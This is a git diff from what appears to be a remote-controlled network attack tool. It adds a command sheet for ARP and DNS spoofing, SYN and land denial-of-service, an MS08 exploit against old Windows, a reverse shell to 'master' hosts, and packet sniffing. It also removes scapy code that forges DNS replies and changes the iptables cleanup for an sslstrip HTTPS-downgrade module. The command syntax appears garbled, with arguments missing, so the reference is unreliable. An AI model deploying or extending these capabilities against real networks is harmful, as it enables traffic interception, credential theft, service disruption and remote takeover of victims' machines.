diff --git a/app/App Command Writeup.txt b/app/App Command Writeup.txt new file mode 100644 index 0000000..dae39a5 --- /dev/null +++ b/app/App Command Writeup.txt @@ -0,0 +1,71 @@ +All commands are reverted by sending the command + "restore" + +Arp Dos: + send-> arpdos:source->list of source ips separated by ":" + arpdos:masq->list of masq ips separated by ":" + arpdos:dest->list of dest ips separated by ":" + command-> + arpdos::: + +Arp Spoof: + send-> arpspoof:source->list of source ips separated by ":" + arpspoof:masq->list of masq ips separated by ":" + arpspoof:dest->list of dest ips separated by ":" + command-> + arpspoof::: + +DNS Spoof: + send-> dnsspoof:target->list of target ips separated by ":" + + command-> + dnsspoof::: + +DOS Land: + send-> dosland:target->list of target ips separated by ":" + + command-> + dosland::: + +DOS Syn DOS: + send-> dossyndos:target->list of target ips separated by ":" + + command-> + dossyndos::::: + +MS08 Exploit: + send-> ms08exploit:target->list of target ips separated by ":" + + command-> + ms08exploit::: + version is 1 for win2000 or 2 or winxp + +NMap Scan: + send-> nmapscan:host->list of hosts separated by ":" + + command-> + nmapscan::: + +ReverseShell: + send-> reverseshell:master->list of master ips separated by ":" + + command-> + reverseshell::::: + +SniffPack: + send-> nothing + + command-> + sniffpack:: + +SynScan: + send-> synscan:target->list of target ips separated by ":" + + command-> + synscan::: + + + + + + diff --git a/capabilities/exploitation/dnsSpoof.py b/capabilities/exploitation/dnsSpoof.py index a27d085..b61f879 100644 --- a/capabilities/exploitation/dnsSpoof.py +++ b/capabilities/exploitation/dnsSpoof.py @@ -27,13 +27,6 @@ def callback(self, packet): packet.accept() else: if self.domain in pkt[DNS].qd.qname: - query = sr1(IP(dst='8.8.8.8')/UDP(dport=53)/DNS(rd=1,qd=DNSQR(qname=self.new_site)),verbose=0) #Create the legitimate query - spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)/\ - UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\ - DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd,\ - an=DNSRR(rrname=pkt[DNS].qd.qname, ttl=10, rdata=query[DNSRR][3].rdata)) - spoofed_pkt.show() - packet.set_payload(str(spoofed_pkt)) packet.accept() else: packet.accept() diff --git a/capabilities/exploitation/sslstrip.py b/capabilities/exploitation/sslstrip.py index f3c3614..52592d2 100644 --- a/capabilities/exploitation/sslstrip.py +++ b/capabilities/exploitation/sslstrip.py @@ -35,8 +35,8 @@ def restore(self): self.getVars() self.proc.terminate() arpEnd(self.masq_ip, self.masq_mac, self.dest_ip, self.dest_mac) - os.system("iptables -F") os.system("killall sslstrip") + os.system("iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000") def launch(self): diff --git a/pip_dependencies b/pip_dependencies index 2240022..7c6313b 100644 --- a/pip_dependencies +++ b/pip_dependencies @@ -11,3 +11,4 @@ pycrypto nose flask_cors sslstrip +ansi2html